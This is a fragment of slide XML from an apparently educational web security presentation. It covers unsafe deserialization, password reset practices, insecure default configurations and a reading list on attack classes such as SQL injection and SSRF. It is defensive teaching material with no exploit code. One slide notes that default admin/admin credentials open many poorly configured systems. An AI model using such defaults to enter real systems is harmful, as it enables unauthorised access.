            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Python Pickle</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ruby YAML and Marshal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>XML</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Java and PHP serialization formats</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Signed serialized objects does reduce the chance of malicious tampering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Signing reduces the chance of an attacker creating new or modifying existing serialized objects into something malicious. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This is fairly risky, however, as cryptographic flaws could lead to code execution!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1983" name="Google Shape;1983;p281"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7044100" y="445024"/>
            <a:ext cx="2413625" cy="24166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2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Learn More?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[REPLACE]</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1989" name="Google Shape;1989;p282"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1270675"/>
            <a:ext cx="8520600" cy="2855100"/>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900" b="1"/>
              <a:t>Secrets Management: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://gist.github.com/maxvt/bb49a6c7243163b8120625fc8ae3f3cd</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="6BBF4E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>Cookies &amp; Sessions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://crypto.stanford.edu/cs142/papers/web-session-management.pdf</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="6BBF4E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>Authentication Bypass:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://compsecurityconcepts.wordpress.com/2013/11/02/authentication-bypass/</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="6BBF4E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>Timing Attacks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://research.kudelskisecurity.com/2013/12/13/timing-attacks-part-1/</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>Information Leakage: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://www.safaribooksonline.com/library/view/the-web-application/9781118026472/chap15-sec013.html</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>Cross-site Scripting: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://excess-xss.com/</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>Authorization Bypass:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://pentest.blog/how-to-test-horizontal-vertical-authorization-issues-in-web-application/</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>Cross-site Request Forgery:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://www.acunetix.com/websitesecurity/csrf-attacks/</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>Local File Inclusion: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://www.imperva.com/docs/HII_Remote_and_Local_File_Inclusion_Vulnerabilities.pdf</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>Unsafe File I/O: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>http://www.peachpit.com/blogs/blog.aspx?uk=Securely-Handling-File-Uploads-Five-Critical-E-Commerce-Security-Tips-in-Five-Days</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>SSRF: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>Resource Exhaustion:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>https://javapipe.com/ddos/blog/ddos-types/</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>SQL Injection:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>Code Execution:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>https://rhinosecuritylabs.com/penetration-testing/remote-code-execution-bug-hunting-chapter-1/</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>Unsafe Deserialization: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>https://www.synopsys.com/content/dam/synopsys/sig-assets/whitepapers/exploiting-the-java-deserialization-vulnerability.pdf</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" b="1"/>
              <a:t>Time-of-Check/Use: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>https://www.cs.utexas.edu/~shmat/courses/cs380s_fall09/06tocttou-porter.pptx</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47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1170225"/>
            <a:ext cx="8520600" cy="3140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sz="1800"/>
              <a:t>Don’t use password reset questions or “Security Questions”</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>The answers to most questions are easily discoverable. Instagram can reveal a pet’s name, yearbooks can reveal old teachers, and Ancestry.com can reveals a mother’s maiden name</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Sarah Palin’s email account was hacked via password reset questions from Wikipedia data</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>What high school did she attend? </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>What is her birthdate? </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Password reset links should contain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1"/>
              <a:t>random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> tokens </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>that expire and are sufficient in size and/or complexity </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>to prevent all online brute force attacks</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Avoid generating tokens with small key space, based on </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>timestamps, or UUID’s</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Google Shape;1027;p1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Resetting Passwords</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Google Shape;1028;p147"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6825475" y="2554425"/>
            <a:ext cx="2148550" cy="1865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48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1198725"/>
            <a:ext cx="8254500" cy="22461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800" b="1"/>
              <a:t>Software often ships with default settings that are insecure</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-292100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Additional configuration is usually required to enable things like authentication, TLS, proper networking, and so on</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1"/>
              <a:t>Default “setup” or admin accounts are usually enabled by default</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-292100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>It’s no secret that admin/admin will get you into a lot of poorly configured systems</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1"/>
              <a:t>“Development” or “Debug” modes are purposefully be less restrictive</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-292100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>These can be very helpful for development and testing, but easy to forget to turn off!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034" name="Google Shape;1034;p148"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322850" y="470325"/>
            <a:ext cx="83364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Insecure Default Configurations</a:t>
            </a:r>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49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1322193"/>
            <a:ext cx="4139100" cy="34164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a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MongoDB, a popular NoSQL database, ships insecure defaults</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Older versions would bind to every host IP address—often making the instances available publically</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
